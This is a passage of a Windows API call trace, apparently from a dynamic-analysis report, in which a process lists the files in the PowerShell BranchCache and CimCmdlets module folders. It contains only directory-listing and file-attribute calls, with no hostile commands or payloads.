SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.099] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0226.099] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0226.099] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.099] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.099] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0226.100] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.101] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.101] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.101] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0226.101] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.101] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.101] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0226.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.102] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.102] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0226.102] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0226.102] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.102] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.103] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0226.103] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0226.103] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0226.103] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.103] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.104] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.104] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.105] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0226.105] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.105] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.106] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.106] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0226.106] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0226.107] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.108] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.108] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.108] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0226.109] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0226.109] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.109] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0226.109] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0226.110] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.110] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.110] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0226.110] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.110] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", 